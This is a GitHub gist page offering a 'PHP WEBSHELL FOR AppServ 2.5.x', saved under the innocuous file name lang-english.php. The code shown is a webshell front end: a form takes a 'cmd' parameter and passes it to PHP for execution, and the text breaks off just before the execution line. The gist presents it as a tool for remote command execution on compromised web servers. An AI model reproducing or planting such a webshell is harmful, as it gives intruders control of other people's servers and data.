Skip to content

Instantly share code, notes, and snippets.

View nikitacontreras's full-sized avatar
🕳️
mental v01d

Nicolás Contreras nikitacontreras

🕳️
mental v01d
View GitHub Profile
@nikitacontreras
nikitacontreras / lang-english.php
Last active February 20, 2024 01:29
PHP WEBSHELL FOR AppServ 2.5.x <
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{